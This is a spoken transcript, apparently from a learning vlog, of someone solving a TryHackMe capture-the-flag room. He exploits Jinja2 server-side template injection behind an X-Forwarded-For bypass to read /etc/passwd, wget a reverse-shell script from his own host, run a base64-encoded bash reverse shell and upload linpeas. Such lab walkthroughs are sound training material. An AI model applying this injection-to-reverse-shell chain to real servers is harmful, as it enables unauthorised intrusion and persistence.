Hey, good morning, everyone. Today is day 11, and I train every day. One try hacker room, one new skill, always ethical, and by 30, I'll be a professional hacker. So, I'm gonna jump right into it today. I've been stuck on this try hacker room for the last 2 days. It involves server side template injection. Now, every time I try to do the server side template injection, I get a 501 error indicating that there's an issue with either the command or something on the server's end. So I need to. Now I'm just booting up the same virtual machine that I had. It's a little bright in here. Let me. There we go. All right. Yep. So I'm just booting up the same virtual machine I had yesterday. So I might have some things already open. Give me one moment as I log in to try hack me. Alright, we're back on Try Hack Me. So let's pull up the room I just had. I could actually probably go to recents here. Come on. Secret, secret, super secret. Alright, and I looked up a few commands. While this boots up, I'll show you guys what I found. It looks like I was trying to also use Metasploit right before I ended the video. Makes no sense though. This is totally going to not. I have to go to that specific website to input the code, and Metasploit wouldn't help me at all. Maybe if the URL was included the injection, maybe that could have worked, but in this case, it definitely wouldn't work. What am I have a lot of stuff open here. Let me actually just. Okay, I still have the VPN on, which is incredible. Let me terminate and restart it, just to be on the safe side. Alright, we got the VPN on. Let's look at my notes real quick so we could see what I was researching. So these were the previous commands I was trying to inject, and I kept getting 501 error. So what I'm thinking is maybe these commands just don't work with this specific engine. So what I've realized is we're using Jinja. Oh, I need to take off that. We're using Jinja 2, and we're gonna test these out to see if we're able to get Etsy password. And if this works, that'd be amazing. That means we could read files, and from there, if we could read files, we could probably progress further and find out what commands we could use. Um, we'll figure that. Oh, we got a nice easy IP too. Nice. I think this room took a while to start up. Let me just see. I don't even need to do any of that. I need to do port 777. Okay, I'll be back when the port's open, and we'll start throwing out these injections, and hopefully we get somewhere. Alright, we are back. We got the room open. Let's hop right into it. It was the IP 10.2.130, a nice easy address. Let's do a 777, and we're going to debug. We're going to open up Burp Suite. I already have it open. Proxy, returning my proxy on. Let's send the first command out. So we have, I'm going to move this over here, way easier. We got Etsy password. Let's see if we can read the passwords file. Okay, good. We're going to put my password that we found, and we're going to get this request. Gonna send it to the repeater just so I get the cookie. Send. This is the cookie. Great. And we're gonna forward that request on out. Sweet. Let's forward it. Excuse me. All right. We're gonna go to. What is this? Where am I even at? Let me get out of those pages. Nice, easy IP. Debug result. Oh, I got to do the. I'm just gonna do. What is it? X forwarded. Oh my goodness. Forwarded for. And come on. Oh, finally. Okay, we got Etsy password. which is great. So we know this command works. So what was that? So open. That was open. I'm gonna see if this command works, because if this command works, I can pull a reverse shell. I'll pull a reverse shell if that works. So, oh my god, I can't believe it finally worked. That's so. We got one command. We know it works. I'm gonna try. Now I also fixed it so quotation marks instead of the apostrophes. We're gonna import the password onto this, and if we could get this working, man, that'd be great. Let's go. We're gonna copy this cookie. It has the password. Did I put the password? I did put the password. Okay, let's forward that request on over. Let's go to debug result. Let's import my correct. I don't think I actually need to change the session code. Okay, let's see what we get. Ooh. Ooh, yes! Yes! Okay, that command also works. Very satisfying. Very, very satisfying. Alright, do I have my shell in here? Where is it? Where is it? Where is it? Oh, I need to go to the room. Super secret. So I have a shell.sh here, and if we just open it up, we can see that I have a command here. So this command is just requesting a reverse shell so that I could get back into their end. And it's on port 4444. So what we're gonna do is we're gonna first host it on port. So let's just do 888. And then I'm gonna get a receive on port 4444. So what it's doing is I'm gonna have this. I'm gonna change the command here. I'm gonna just copy this, and instead of using curl, I'm gonna use wget, and I'm gonna put my IP in. I don't actually know my IP. 10.6.56.192 on port 888 slash. You know what? Maybe I should just do it on port 80. I feel like that way I don't have to put the colon 8888. I'm gonna do that. I'm gonna put it on port 80 so I don't have to do all that. Let's do 80. Okay. So we're hosting that on just port 80. Where is it? Here it is. You're gonna don't need to do that. And we're gonna get shell.sh. Okay. We got this command going here. Hopefully this works out exactly how I need it to. Let's put that command in. Let's put in the password. Whoops, the password. Boom. Burp Suite. What do we got on Burp Suite here? Okay. Let's copy this session ID just in case. We're gonna forward that over. Beautiful. Accepted it. Let's go to debugger. Let's put in my X forward. 4. Oh, jeez. That one. Come on, come on, come on, come on. I typed the command wrong, clearly. Okay. Let's think about it. Let's think about it. Let's think about it. Okay. Let me do it from my end. Let's just see. Maybe I get to tell what I did wrong. I'm literally going to wget myself because maybe I typed the command wrong. So I'm literally just going to do wget. Whoops. Yep, wget http 10.6.56.192 shell.sh. Got it though. That didn't trigger my reverse shell, did it? Okay, good. Let me try without the HTTP. Maybe that's what it is. Maybe it's the HTTP that's throwing it off. Let's try that again. Oh, did I also not close the... I know I did close the quotation marks. Let's try it again. We'll figure this out. We're getting close because we know that the previous commands are working. So... does OS cover wget? That's really what I need to know. We're going to see if it does. Okay, let's add the IM debug. Let's copy this cookie just in case. We're gonna refresh this page. We're going to add my signature X forwarded for localhost forward. Still same. Okay. Let me try. Is this what I'm looking for? Let's see if that returns that. Whoops. No, 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 no. Where is it? Where is it? Where is it? This one here. I'm gonna do, instead of that command, I'm gonna try which wget. And then let's add import debug. Let's do that. Grab the beautiful cookie here, forward. And let's hop over here. Put my, okay, forward. Do I get, oh, did I not? What did I do? X forwarded. Forward. Do I need to update the cookie maybe? I might have to update the cookie. I'm gonna send this to repeater before I send it just to see if it works. Did I get 200? I got a server error. Maybe it's the wrong cookie. Put that cookie in just in case. I still got a server error. And I did which we get wget. Let me just make sure I did. Let me try ID again. Maybe, let me try this again. This time I just changed it to ID here. I am debug. Let's do, I didn't even type that right. Oh my god. I think I have to drop this packet. Did it keep the, no, it took the password. Okay, good, good, good. And is this ID? ID, good. Copy that session code. Let's go here. Session. Oh, right, X forwarded. X forwarded for localhost. What is going on? I can't get anything to work now. No way. I think I see what I did wrong. I think I see what, wrong password. Oh, did it not? I must have messed this up somehow. Let me try this again. Copy this. Forward it over. Get a nice refresh. X dash forwarded. 4, 1, there we go. Okay. So I think the command I had, I think I mistyped it somehow. Because I don't have the same amount of underscores on it. So what I'm gonna do is, I don't know what I did wrong there. Oh, it kept the formatting for some reason. Wow. Huh. It doesn't copy and paste how I, let me show you guys this. Let me show you guys. Maybe that's what's been screwing me this whole time. So if I could actually just move this over. There we go. Look what happens when I paste this. It, 1 underscore. Oh my goodness. I can't believe that's been happening. So, I wonder if that's what's been screwing me over this whole time. Can you believe if that was the issue? Oh my god, that'd be a nightmare if that was the issue this whole time. So, I'm still listening, and I'm still importing. So, wget 10, 6, 56, 192. Shell.sh. Oh my goodness. Oh my god. Imagine that was the issue this whole time. Oh. Come on, come on, come on. Debug result. Let's go. Come on. X forwarded. 4. Come on, come on, come on, come on, please. Yes! Was that the issue the whole time? Oh my god. on, and as we can see, it took the shell, and now we just gotta see if the shell executed. So, the moment of truth. It didn't execute. Okay. That's okay, though. That's okay. I think we know where to go from this point. Maybe I have it read it? Maybe I can get to curl it. And then we do an SH. I'm gonna see if I can get to curl it. Because okay, it downloaded it. So maybe I just need to read the file? Maybe that's all I have to do is have it read the file. So I'm gonna send another command then. Okay, so let's do that. I'm just gonna send this another command. It's gonna be the read command this time. And let's see if this pastes correctly. Okay, okay. And then let's do a shell.sh. Let's see if that's all I need to do. If not, I think I have another way to go about this. I'm so happy that finally downloaded though. Alright, debug result. And let's put my forward in there. Forward? What did I... Did not take the cookie? X dash forwarded 4 127. Okay, another successful command, but nothing. $11.58. Oh, did it pull the S shell again? Why did it pull shell again? I wanted to read it. Open. Shell.sh. I'm about to put this right here because, jeez, this took forever to find. Okay. AM debug. Forward. This. X. Forwarded. 4. Did not copy and paste how I needed to. Again. Okay, give me 1 second. Let me just find out how to execute it. I'm so close. Alright, I am back. So I'm thinking maybe... Oh, let me go pull up. Let's go back to track me. Super. Okay. So this... I'm thinking I might have to convert this to base 64 because I think the symbol, this ampersand, isn't working. So here, I was crafting some commands over here. So I'm looking for a symbol safe shell. So if I just look up a symbol safe shell real quick. Where was the GitHub? Okay, well, regardless. This is the command I am looking for. Where is it? Okay, so symbol safe. So I need to do... I don't actually understand my code real quick. Jeez. Come on. I'm so close. That's frustrating. How do I get it to read this? So... Let me make it executable. Maybe I gotta make it executable and then I just open it. Okay, so let's see what happens when I do that. So this was the command. Let me just make sure this works before... Do I see 2 underscores everywhere? Nice. Nice. So let me do a change mod plus x shell.sh. Okay. Okay. Great. and debug. And let me just make sure I have my reverse shell on before I get too far in this. Reverse shell's on. Okay. Okay. My listener's on rather. Proxy. We could drop all this traffic. All right. Let me grab the cookie session. Forward. All right. Let's go over here. Boom. Put by X forwarded. Forward. Okay. The command went through. So it's executable now. So maybe I just gotta read it. So let me go back to here. And with my get flash, let's just do shell.sh. And then imdebug. That's the password. Grab this cookie session. Alright. Come on. X dash forwarded 4.127.01. Internal server error. Why? What is messed up here? Whoa. Let me just see if this command by itself works, because I noticed just only one underscore there, but I think it's meant to be like that. But I'm gonna check. This command should work just by itself. I don't see why it wouldn't. Forward. Seven oh one forward. So the command itself worked. Right. Let me hit an ls. Let me just make sure that it's in the directory. Paste. Does everything look good here? ls. Let's do an imdebug. Forward. That went through right. Debug statement is clean. Here. I want to copy and paste this because, oh my god. Forward. Okay. We gotta find where it's saved. I wonder if I could get the user flag from this. Let me try that. Okay, I'm gonna try to get the user flag real quick. What is it? ls. Let's do home. And then, did I copy the password? No. Forward. X dash forwarded for 701. F30S or AHAM. I'm gonna try AHAM first, just so I can get this flag. Okay, so this is a username. Let me put that as the username. Let me put the other username too. I'm guessing this guy must be root. AHAM and paste it formatted for some reason. F30S. Okay. So I am is apparently the username we're hacking into here. So if I could get this out of formatting mode. Okay. Let's copy that command again. ls. Let's go to home. Let's go to IAM. Let's see what we got here. I'm guessing the user flag would be right in this directory, but I'm gonna just ls it first before I get too deep. imdebug. Beautiful password on that one. Okay, cut the password first. Get this command. Everything looks good there. ls home IAM. Let's debug. Forward. Nice. Okay, grab this cookie session. Did I even need to grab this session? Actually, no, I didn't even need to. If X forwarded for doing localhost again, come on. It's a little flag1.txt. Oh Ah, it's right there. Okay. Now, this isn't exactly a reverse shell. However, it's better than nothing. I am flag one that text. Right, okay. I am debug. I gotta stop copying that. I don't need to. Forward. I went through. I just need to make sure I got that forwarded. Come on, come on, come on, come on, come on, please. So I am doing local file injection. I just kind of didn't successfully go through it. I just used the manipulation of the SSTI injection. Oh my god! Finally, though, we got one of the flags, but I need to get reverse shell on it. So that's the next step is getting reverse shell. Scroll. Come on. What are you doing? What is it doing? Come on. All right. What is the passphrase for flag 2? Oh boy, great. We got some more. All right. I would say that's a success. That's a success. We finally got through the first part. We got the first flag. Took long enough. However, we still got to get the LFI or the remote shell on this. So that was part 1. Let's get my local. Let's find where my shell uploaded to. So I'm going to see if it went to the temp folder because I feel like that's typically where it would go to. We're going to forward this request. We're going to refresh this. Let's do this one, my get request. X forwarded for localhost forward. Where did this upload to? It's not in the temp folder. So now what I'm thinking is we gotta find where shell uploaded to, huh? Almost like I just call it straight from the command. Can I call this straight from the command with base 64? So it's still this command. How do I do this? So I could call this probably straight from here if I just encode it with base 64 and then decode it. So let me see what I got here. So that's my shell. Let me copy this. Let's do an echo. Okay. And I want this to be base 64. Okay, that's my base 64 for 10, 656, 192. I'm gonna change the port on it. Just to feel cooler. Alright, I already feel cooler. Okay. Alright. I feel pretty cool with that one. So, then with this, would I do this? And then I decode it and I send is this did that just connect me? I'm gonna try this. I don't know if that's gonna work. However, what do I got to lose? Paste. And then quotations ends. Okay. So that's my crafted payload. I don't know if that's gonna work. It'd be amazing if it does. However, I just don't know. Not now. Forward this request. Refresh. No. Why'd I open that? Open this. X forwarded for 127. Please. It went through. Let's check the terminal. Damn. Damn. Yeah. That's fine. For both would be nice. And port 1337. I wonder why that didn't work. What am I? Okay, let me think about this for a second, because I don't know. I'll be back. Let me think about it for a bit here. Oh, alright. So, I remade it with bash dash c, bash I, then I'm going to see if this payload is what I need. So, let's grab my initial command. And we're going to change this to that. So, hold on, let me actually, I am watching a guide to help me out here. I kind of got stuck at this part. He makes the payload into 64. Oh, then does he? Okay, so does he just echo it? That's what I was just curious. I don't know if he just literally just echoes it. I think he just echoes it. Okay, that's exactly what he does. Okay, okay, so I was on the right track. Echo. My bash, or is it? What is happening? What was that? Okay. This is my command in base 64. Now I want to decode that so it could run it. So we're gonna pull the old. No. What's happening? Pull the old this. Base 64. We're gonna do that again. Bash. Okay. Oh no, I have two quotation marks. Did I screw anything? Okay, good. Okay, so base 60. No, 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 no. What's happening here? What is happening here? So we want to decode this. How to mess this up pretty bad. Bash 2 colon and probably put that closer. Dot read. Good. Okay. Let's see how bad I messed that up. Let's just see how it goes. I don't know. I don't know if this is gonna go through. I feel like I feel like this is user error on my part. Let's forward that request. Let's go to the bug result. Let's fix this up so it can work for me. Alright, what do we got? Okay, so it processed the request. Terminal. Holy crap. Yes! Okay. Oh my god. I finally got the reverse shell. Secret tip, huh? A wise GPT once said, in the depths of a hidden vault, the mastermind discovered that vital of their secret had vanished without a trace. They knew there was a was now vulnerable to disruption, setting in motion a desperate race against time to recover the missing before their unraveled before their eyes. So I was missing two. What were they called? I actually forgot. Anyways, I don't remember them. They're important. The past, back before, not after, actually matters. Follow it. Don't forget, it's always about root. I'm guessing that was a hint. But what kind of hint was that, dude? Um, yeah, let's start searching through this. Finally, dude. So this is obviously the admin account. I don't think I can get into here. What is this? File, health check. ASCII text. Delete. Funny. File, site check. No read permission. Can I doubt I can do sudo L. Timeout. Can I W get up in here? So I got linpies. So we got linpies. Python. I port 8000. I want to go on 80. Let's go back to my reverse shell. Alright, now we got linpiece here. We're gonna just make it executable. Linpiece? Don't tell me I broke it. No, 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 no. I think I broke the shell. Dang it! Dang it, I could get back, but maybe I should find a persistent way to get back into this account. Ham. Paint. Alright. Let's reverse shell back into it. What a pain. I might have to craft something real quick. I wonder if this will work. See, I just don't know if it's going to copy and paste correctly. Whoops. Okay. Let's get back over here. Let me just see if I got the reverse. I did. Okay. How do I make myself persistent? Let's see out of here. CD more? I don't think I can. I have to make myself persistent, obviously. Remove LS. Remove lint peas. W get. I don't know why it echoes back what I'm saying. What happened to that script I uploaded? Curl. Google.com. You know what? I gotta stop doing that. Let me drop that. Oh, I'm gonna forward it. Doesn't matter. Okay, so the objective now is to get persistent shell. However, I'm gonna go to the gym and I'll be back.